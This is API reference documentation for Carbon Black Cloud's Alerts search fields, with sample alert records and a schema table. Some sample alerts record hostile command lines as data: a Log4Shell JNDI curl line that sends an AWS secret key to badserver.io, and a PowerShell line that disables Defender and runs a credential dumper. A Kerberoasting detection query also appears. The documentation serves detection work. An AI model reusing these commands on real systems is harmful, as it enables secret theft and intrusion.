Search Fields - Alerts
Version: API v7
The following table lists the fields that can be returned in the response or used for searching with the Carbon Black Cloud using any of
Using the Schema
View the definition of each field, default values, whether it is required, searchable and/or tokenized. You can also see accepted values and routes supported per each field.
Possible Alert Types
Icons indicate the alert types a field is valid for.
- CB_ANALYTICS - These fields are part of a CB Analytics alert type
- CONTAINER_RUNTIME - These fields are part of a Container Runtime alert type
- WATCHLIST - These fields are part of a Watchlist alert type
- DEVICE_CONTROL - These fields are part of a Device Control alert type
- HOST_BASED_FIREWALL - These fields are part of a Host Based Firewall alert type
- INTRUSION_DETECTION_SYSTEM - These fields are part of a Intrusion Detection System alert type
- FACET - These fields can be used for returning most prevalent values.
Alert Type Examples
{
"org_key":"ABCD1234",
"alert_url":"defense-dev01.cbdtest.io/alerts?s[c][query_string]=id:ca316d99-a808-3779-8aab-62b2b6d9541c&orgKey=ABCD1234",
"id":"ca316d99-a808-3779-8aab-62b2b6d9541c",
"type":"INTRUSION_DETECTION_SYSTEM",
"backend_timestamp":"2023-02-03T17:27:33.007Z",
"user_update_timestamp":null,
"backend_update_timestamp":"2023-02-03T17:27:33.007Z",
"detection_timestamp":"2023-02-03T17:22:03.945Z",
"first_event_timestamp":"2023-02-03T17:22:03.945Z",
"last_event_timestamp":"2023-02-03T17:22:03.945Z",
"severity":1,
"reason":"HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit",
"reason_code":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857",
"threat_id":"bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017",
"primary_event_id":"21AB6B27-9F72-11ED-A79A-005056A53F17",
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"sensor_action":"ALLOW",
"workflow":{"change_timestamp":"2023-02-03T17:27:33.007Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON",
"status":"OPEN"},
"determination":{"change_timestamp":"2023-02-03T17:27:33.007Z",
"value":"NONE",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION"},
"tags":null,
"alert_notes_present":false,
"threat_notes_present":false,
"is_updated":false,
"rule_category_id":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D",
"rule_id":"B5974D4D-265E-4FAF-8F71-2F76AAD67857",
"device_id":17482451,
"device_name":"DEV01-39X-1",
"device_uem_id":"",
"device_target_value":"MEDIUM",
"device_policy":"Standard",
"device_policy_id":165700,
"device_os":"WINDOWS",
"device_os_version":"Windows 10 x64",
"device_username":"DemoMachine",
"device_location":"UNKNOWN",
"device_external_ip":"66.170.99.2",
"device_internal_ip":"10.203.105.21",
"mdr_alert":false,
"mdr_alert_notes_present":false,
"mdr_threat_notes_present":false,
"ttps":[],
"attack_tactic":"TA0001",
"attack_technique":"T1190",
"process_guid":"ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0",
"process_pid":5780,
"process_name":"c:\\windows\\system32\\curl.exe",
"process_sha256":"d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4",
"process_md5":"eac53ddafb5cc9e780a7cc086ce7b2b1",
"process_effective_reputation":"TRUSTED_WHITE_LIST",
"process_reputation":"TRUSTED_WHITE_LIST",
"process_cmdline":"curl -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids",
"process_username":"DEV01-39X-1\\bit9qa",
"process_issuer":["Microsoft Windows Production PCA 2011"],
"process_publisher":["Microsoft Windows"],
"parent_guid":"ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a",
"parent_pid":8796,
"parent_name":"c:\\windows\\system32\\cmd.exe",
"parent_sha256":"b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450",
"parent_md5":"8a2122e8162dbef04694b9c3e0b6cdee",
"parent_effective_reputation":"TRUSTED_WHITE_LIST",
"parent_reputation":"TRUSTED_WHITE_LIST",
"parent_cmdline":"\"C:\\WINDOWS\\system32\\cmd.exe\" ",
"parent_username":"DEV01-39X-1\\bit9qa",
"childproc_guid":"",
"childproc_username":"",
"childproc_cmdline":"",
"netconn_remote_port":80,
"netconn_local_port":49233,
"netconn_protocol":"",
"netconn_remote_domain":"google.com",
"netconn_remote_ip":"142.250.189.174",
"netconn_local_ip":"10.203.105.21",
"netconn_remote_ipv4":"142.250.189.174",
"netconn_local_ipv4":"10.203.105.21",
"tms_rule_id":"4b98443a-ba0d-4ff5-b99e-e5e70432a214",
"threat_name":"CVE-2021-44228 Exploit",
"threat_hunt_id": "0ff0725d-22c0-4b8f-95ea-a798e544e408",
"threat_hunt_name": "GroutLoader Test"
}
{
"org_key":"ABCD1234",
"alert_url":"defense-dev01.cbdtest.io/alerts?s[c][query_string]=id:f0c7970b-f23c-919e-0cd8-7a38bd373a6f&orgKey=ABCD1234",
"id":"f0c7970b-f23c-919e-0cd8-7a38bd373a6f",
"type":"CONTAINER_RUNTIME",
"backend_timestamp":"2023-02-06T00:13:37.663Z",
"user_update_timestamp":"2023-04-13T11:55:52.550Z",
"backend_update_timestamp":"2023-02-06T00:13:37.663Z",
"detection_timestamp":"2023-02-06T00:10:51.176Z",
"first_event_timestamp":"2023-02-06T00:09:19.320Z",
"last_event_timestamp":"2023-02-06T00:09:19.320Z",
"severity":5,
"reason":"Detected a connection to a public destination that isn't allowed for this scope",
"reason_code":"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58",
"threat_id":"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c",
"primary_event_id":"X0z55sxeTGWPfKuzPkFlCg-61",
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"sensor_action":"ALLOW",
"workflow":{
"change_timestamp":"2023-04-13T11:55:52.550Z",
"changed_by_type":"USER",
"changed_by":"janaw+csr@vmware.com",
"closure_reason":"NO_REASON",
"status":"IN_PROGRESS"
},
"determination":{
"change_timestamp":"2023-02-22T21:07:57.955Z",
"value":"NONE",
"changed_by_type":"USER",
"changed_by":"janaw+superadmin2@vmware.com"
},
"tags":["の結果"],
"alert_notes_present":false,
"threat_notes_present":true,
"is_updated":false,
"mdr_alert":false,
"mdr_alert_notes_present":false,
"mdr_threat_notes_present":false,
"netconn_remote_port":443,
"netconn_local_port":56618,
"netconn_protocol":"TCP",
"netconn_remote_domain":"westeurope.monitoring.azure.com",
"netconn_remote_ip":"20.50.65.82",
"netconn_local_ip":"10.244.2.22",
"netconn_remote_ipv4":"20.50.65.82",
"netconn_local_ipv4":"10.244.2.22",
"k8s_cluster":"tomer:sensor-aks",
"k8s_namespace":"kube-system",
"k8s_kind":"DaemonSet",
"k8s_workload_name":"ama-logs",
"k8s_pod_name":"ama-logs-gm5tt",
"k8s_policy_id":"2e5170e7-2665-49d2-829e-f5bdeefe6b06",
"k8s_policy":"Big runtime policy",
"k8s_rule_id":"f8b1637a-dc0c-49bb-bc28-5b48f97e6d58",
"k8s_rule":"Allowed public destinations",
"connection_type":"EGRESS",
"egress_group_id":"",
"egress_group_name":"",
"ip_reputation":96,
"remote_is_private":false
}
{
"org_key":"ABCD1234",
"alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:3d80bd8b-7770-40a7-8d6b-8268fb15c59f&orgKey=ABCD1234",
"id":"3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
"type":"WATCHLIST",
"backend_timestamp":"2023-07-17T17:21:34.063Z",
"user_update_timestamp":null,
"backend_update_timestamp":"2023-07-17T17:21:34.063Z",
"detection_timestamp":"2023-07-17T17:21:13.483Z",
"first_event_timestamp":"2023-07-17T17:19:00.412Z",
"last_event_timestamp":"2023-07-17T17:19:00.412Z",
"severity":10,
"reason":"Process powershell.exe was detected by the report \"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\" in watchlist \"AMSI Threat Intelligence\"",
"reason_code":"cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab",
"threat_id":"CF4E6DE74AA8B188C0346A54FDEA940C",
"primary_event_id":"VUX7Bu7vTrWwnU8-uSVh1A-0",
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"sensor_action":"ALLOW",
"workflow":{
"change_timestamp":"2023-07-17T17:21:34.063Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON",
"status":"OPEN"
},
"determination":{
"change_timestamp":"2023-07-17T17:21:34.063Z",
"value":"NONE",
"changed_by_type":null,
"changed_by":null
},
"tags":null,
"alert_notes_present":false,
"threat_notes_present":false,
"is_updated":false,
"device_id":5890528,
"device_name":"ABT102675",
"device_uem_id":"596B6C4DD49AEF4AB3713363DDBB1F11",
"device_target_value":"MEDIUM",
"device_policy":"default",
"device_policy_id":6525,
"device_os":"WINDOWS",
"device_os_version":"Windows 11 x64",
"device_username":"DemoMachine",
"device_location":"UNKNOWN",
"device_external_ip":"49.206.61.4",
"device_internal_ip":"192.168.0.104",
"mdr_alert":false,
"mdr_alert_notes_present":false,
"mdr_threat_notes_present":false,
"report_id":"LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018",
"report_name":"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior",
"report_description":"Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. This detection looks for fileless behaviors related to the out of band kerberos ticket request. If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.",
"report_tags":[
"credentialaccess",
"t1558",
"windows",
"amsi",
"attack",
"attackframework"
],
"report_link":"https://attack.mitre.org/techniques/T1558/003/",
"ioc_id":"b1c1ae83-f66b-4aa3-a496-363e296f4018",
"ioc_hit":"fileless_scriptload_cmdline:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\" OR scriptload_content:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\"",
"watchlists":[{
"id":"Ci7w5B4URg6HN60hatQMQ",
"name":"AMSI Threat Intelligence"
}],
"process_guid":"ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423",
"process_pid":13636,
"process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"process_sha256":"d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd",
"process_md5":"0499440c4b0783266183246e384c6657",
"process_effective_reputation":"TRUSTED_WHITE_LIST",
"process_reputation":"TRUSTED_WHITE_LIST",
"process_cmdline":"powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -",
"process_username":"NT AUTHORITY\\SYSTEM",
"process_issuer":["Microsoft Windows Production PCA 2011"],
"process_publisher":["Microsoft Windows"],
"parent_guid":"ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9",
"parent_pid":10384,
"parent_name":"c:\\program files\\unowhy\\hisqool manager\\hisqoolmanager.exe",
"parent_sha256":"4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282",
"parent_md5":"c7e583681f0958d4f5d32afd09d8084b",
"parent_effective_reputation":"NOT_LISTED",
"parent_reputation":"NOT_LISTED",
"parent_cmdline":"\"C:\\Program Files\\Unowhy\\HiSqool Manager\\HiSqoolManager.exe\" ",
"parent_username":"NT AUTHORITY\\SYSTEM",
"childproc_guid":"",
"childproc_username":"",
"childproc_cmdline":"",
"ml_classification_final_verdict":"ANOMALOUS",
"ml_classification_global_prevalence":"MEDIUM",
"ml_classification_org_prevalence":"LOW"
}
{
"org_key":"ABCD1234",
"alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:411eedfc-8408-2f9e-59f2-a83dfaae0ec1&orgKey=ABCD1234",
"id":"411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
"type":"CB_ANALYTICS",
"backend_timestamp":"2023-07-17T17:16:50.960Z",
"user_update_timestamp":null,
"backend_update_timestamp":"2023-07-17T17:29:19.996Z",
"detection_timestamp":"2023-07-17T17:15:51.708Z",
"first_event_timestamp":"2023-07-17T17:15:33.396Z",
"last_event_timestamp":"2023-07-17T17:27:59.192Z",
"severity":5,
"reason":"A known virus (HackTool: Powerpuff) was detected running.",
"reason_code":"T_REP_VIRUS",
"threat_id":"9e0afc389c1acc43b382b1ba590498d2",
"primary_event_id":"94953e4524c511ee86284f0541a5184d",
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"sensor_action":"ALLOW",
"workflow":{
"change_timestamp":"2023-07-17T17:16:50.960Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON",
"status":"OPEN"
},
"determination":{
"change_timestamp":"2023-07-17T17:16:50.960Z",
"value":"NONE",
"changed_by_type":null,
"changed_by":null
},
"tags":null,
"alert_notes_present":false,
"threat_notes_present":false,
"is_updated":true,
"device_id":6948863,
"device_name":"Kognos-W19-CB-3",
"device_uem_id":"",
"device_target_value":"MISSION_CRITICAL",
"device_policy":"SSQ_Policy",
"device_policy_id":112221,
"device_os":"WINDOWS",
"device_os_version":"Windows Server 2019 x64",
"device_username":"demouser@demo.org",
"device_location":"OFFSITE",
"device_external_ip":"34.234.170.45",
"device_internal_ip":"10.0.14.120",
"mdr_alert":false,
"mdr_alert_notes_present":false,
"mdr_threat_notes_present":false,
"ttps":[
"MALWARE_APP",
"RUN_MALWARE_APP",
"MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER",
"FILELESS",
"MITRE_T1059_001_POWERSHELL"
],
"attack_tactic":"",
"attack_technique":"",
"process_guid":"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73",
"process_pid":3600,
"process_name":"c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1",
"process_sha256":"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0",
"process_md5":"42a80cc2333b612b63a859f17474c9af",
"process_effective_reputation":"KNOWN_MALWARE",
"process_reputation":"KNOWN_MALWARE",
"process_cmdline":"\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}",
"process_username":"KOGNOS-W19-CB-3\\Administrator",
"process_issuer":[],
"process_publisher":[],
"parent_guid":"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed",
"parent_pid":4024,
"parent_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"parent_md5":"",
"parent_effective_reputation":"TRUSTED_WHITE_LIST",
"parent_reputation":"TRUSTED_WHITE_LIST",
"parent_cmdline":"",
"parent_username":"KOGNOS-W19-CB-3\\Administrator",
"childproc_guid":"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000",
"childproc_name":"",
"childproc_sha256":"",
"childproc_md5":"",
"childproc_effective_reputation":"RESOLVING",
"childproc_username":"KOGNOS-W19-CB-3\\Administrator",
"childproc_cmdline":""
}
Additional indicators
- Searchable - Indicates that the field can be used in the
criteria,exclusionorqueryelements of alerts requests e.g.process_name:chrome.exe - Searchable Array - Indicates that the field can be used in the
criteria,exclusionorqueryelements of alerts requests and that incriteriaandexclusionelements it is an array that may contain multiple values - Searchable Time Range - Indicates that the field can be used in the
criteria,exclusionorqueryelements of alerts requests and that incriteriaandexclusionelements it is an object with eitherstartandendparameters or arangeparameter. See Alerts API - Time Range Filter for more details. - Sortable - Indicates that the field can be used in sort request
- All fields can be specified for inclusion in the Export Alerts results
Searching across both Endpoint Standard and Enterprise EDR data? See below for limitations.
Schema
Note: Additional details and examples can be found in the Carbon Black Cloud console search guide.| Field Name | Definition | Datatype | Alert Types Supported |
|---|---|---|---|
alert_notes_present |
Searchable
True if notes are present on the alert ID. False if notes are not present. |
Boolean
|
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
alert_origin |
Searchable
How the alert was created. |
String
MDR, MDR_THREAT_HUNT |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
alert_url |
Link to the alerts page for this alert. Does not vary by alert type | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
attack_tactic |
Searchable Array
A tactic from the MITRE ATT&CK framework; defines a reason for an adversary’s action, such as achieving credential access |
String | CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
attack_technique |
Searchable Array
A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access |
String | CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
backend_timestamp
(Use time_range in search requests) |
Searchable Time Range
Sortable Timestamp when the Carbon Black Cloud processed and enabled the alert for searching. Corresponds to the Created column on the Alerts page. This field is searched by the time_range request field and defaults to the previous two weeks on requests that include this field. |
ISO 8601 UTC Date String
Note: This field is not valid in criteria. The top-level parameter time_range must be used.
Uses the Time Range Object |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
backend_update_timestamp |
Searchable Time Range
Sortable Timestamp when the Carbon Black Cloud initiated and processed an update to an alert. Corresponds to the Updated column on the Alerts page. Note that changes made by users do not change this date; those changes are reflected on user_update_timestamp |
ISO 8601 UTC Date String
Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
blocked_effective_reputation |
Searchable Array
Effective reputation of the blocked file or process; applied by the sensor at the time the block occurred |
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
blocked_md5 |
Searchable Array
MD5 hash of the child process binary; for any process terminated by the sensor |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
blocked_name |
Searchable Array
Tokenized file path of the files blocked by sensor action |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
blocked_sha256 |
Searchable Array
SHA-256 hash of the child process binary; for any process terminated by the sensor |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_cmdline |
Searchable Array
Command line for the child process |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_effective_reputation |
Searchable Array
Effective reputation of the child process; applied by the sensor at the time the event occurred |
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
childproc_guid |
Searchable Array
Unique process identifier assigned to the child process |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_md5 |
Searchable Array
Hash of the child process' binary (Enterprise EDR) |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_name |
Searchable Array
Filesystem path of the child process' binary |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_sha256 |
Searchable Array
Hash of the child process' binary (Endpoint Standard) |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_username |
Searchable Array
User context in which the child process was executed |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
connection_type |
Searchable Array
Connection Type |
String
INTERNAL_INBOUND
INTERNAL_OUTBOUND
INGRESS
EGRESS |
CONTAINER_RUNTIME FACET |
detection_timestamp |
Searchable Time Range
Sortable Timestamp when the alert was first detected. For sensor-sent alerts, this is the time of the event on the sensor. For alerts generated on the backend, this is the time the backend system triggered the alert. |
ISO 8601 UTC Date String
Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
determination |
User-updatable determination of the alert | Nested Response Object:
|
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
determination_change_timestamp |
Searchable Time Range
When the determination was updated. |
ISO 8601 UTC Date String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
determination_changed_by |
User the determination was changed by. | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
determination_changed_by_type |
Searchable
|
String
SYSTEM
USER
API
AUTOMATION |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
determination_value |
Searchable Array
Determination of the alert set by a user |
String
NONE
TRUE_POSITIVE
FALSE_POSITIVE |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
device_external_ip |
Searchable Array
IP address of the endpoint according to the Carbon Black Cloud; can differ from device_internal_ip due to network proxy or NAT; either IPv4 (dotted decimal notation) or IPv6 (proprietary format) |
String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_id |
Searchable Array
ID of devices |
Integer
|
CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
device_internal_ip |
Searchable Array
IP address of the endpoint reported by the sensor; either IPv4 (dotted decimal notation) or IPv6 (proprietary format) |
String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_location |
Searchable Array
Whether the device was on or off premises when the alert started, based on the current IP address and the device’s registered DNS domain suffix |
String
ONSITE
OFFSITE
UNKNOWN |
CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_name |
Searchable Array
Device name |
String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
device_os |
Searchable Array
Device Operating Systems |
String
WINDOWS
MAC
LINUX
OTHER |
CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_os_version |
Searchable Array
The operating system and version of the endpoint. Requires Windows CBC sensor version 3.5 or later. |
String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_policy |
Searchable Array
Device policy |
String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
device_policy_id |
Searchable Array
Device policy id |
Integer
|
CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_target_value |
Searchable Array
Sortable Target value assigned to the device, set from the policy |
String
LOW
MEDIUM
HIGH
MISSION_CRITICAL |
CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_uem_id |
Searchable Array
Device correlation with WS1/EUC, required for our Workspace ONE Intelligence integration to function |
String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_username |
Searchable Array
Users or device owners of alerts |
String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
egress_group_id |
Searchable Array
Unique identifier for the egress group |
String | CONTAINER_RUNTIME |
egress_group_name |
Searchable Array
Name of the egress group |
String | CONTAINER_RUNTIME |
external_device_friendly_name |
Searchable Array
Human-readable external device names |
String | DEVICE_CONTROL FACET |
first_event_timestamp |
Searchable Time Range
Sortable Timestamp when the first event in the alert occurred |
ISO 8601 UTC Date String
Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
id |
Searchable Array
Unique IDs of alerts |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
ioc_field |
The field the indicator of comprise (IOC) hit contains | String | WATCHLIST |
ioc_hit |
IOC field value or IOC query that matches | String | WATCHLIST |
ioc_id |
Unique identifier of the IOC that generated the watchlist hit | String | WATCHLIST |
ip_reputation |
Searchable Array
Range of reputations to accept for the remote IP: 0: unknown 1-20: high risk 21-40: suspicious 41-60: moderate 61-80: low risk 81-100: trustworthy There must be two values in this list. The first is the lower end of the range (inclusive) the second is the upper end of the range (inclusive) |
Integer
|
CONTAINER_RUNTIME |
is_updated |
Set to true if this is an updated copy of the alert initiated by the Carbon Black Cloud backend. User workflow updates, such as adding a note, will generate a new copy of the alert, but is_updated will be set to false. |
Boolean
|
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
k8s_cluster |
Searchable Array
K8s Cluster name |
String | CONTAINER_RUNTIME FACET |
k8s_kind |
Searchable Array
K8s Workload kind |
String | CONTAINER_RUNTIME |
k8s_namespace |
Searchable Array
K8s namespace |
String | CONTAINER_RUNTIME FACET |
k8s_pod_name |
Searchable Array
Name of the pod within a workload |
String | CONTAINER_RUNTIME |
k8s_policy |
Searchable Array
Name of the K8s policy |
String | CONTAINER_RUNTIME FACET |
k8s_policy_id |
Searchable Array
Unique identifier for the K8s policy |
String | CONTAINER_RUNTIME FACET |
k8s_rule |
Searchable Array
Name of the K8s policy rule |
String | CONTAINER_RUNTIME FACET |
k8s_rule_id |
Searchable Array
Unique identifier for the K8s policy rule |
String | CONTAINER_RUNTIME FACET |
k8s_workload_name |
Searchable Array
Sortable K8s Workload Name |
String | CONTAINER_RUNTIME FACET |
last_event_timestamp |
Searchable Time Range
Sortable Timestamp when the last event in the alert occurred |
ISO 8601 UTC Date String
Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
mdr_alert |
Searchable
Is the alert eligible for review by Carbon Black MDR Analysts? |
Boolean
|
FACET |
mdr_alert_notes_present |
Searchable
Customer visible notes at the alert level that were added by a MDR analyst |
Boolean
|
|
mdr_determination |
Mdr updatable classification of the alert | Nested Response Object:
|
|
mdr_determination_change_timestamp |
Searchable Time Range
When the last MDR classification change occurred |
ISO 8601 UTC Date String
Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object |
|
mdr_determination_value |
Searchable
A record that identifies the whether the alert was determined to represent a likely or unlikely threat. |
String
NOT_ENOUGH_INFO
NOT_REVIEWED
NONE
UNLIKELY_THREAT
LIKELY_THREAT |
FACET |
mdr_threat_notes_present |
Searchable
Customer visible notes at the threat level that were added by a MDR analyst |
Boolean
|
|
mdr_workflow |
MDR-updatable workflow of the alert | Nested Response Object:
|
|
mdr_workflow_change_timestamp |
Searchable Time Range
Sortable When the last MDR status change occurred |
ISO 8601 UTC Date String
Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object |
|
mdr_workflow_is_assigned |
Searchable
|
Boolean | |
mdr_workflow_status |
Searchable Array
Primary value used to capture status change during MD Analyst’s alert triage |
String
UNCLAIMED
IN_PROGRESS
TRIAGE_COMPLETE
ACTION_REQUESTED
PENDING_RESPONSE
RESPONCE_RECEIVED |
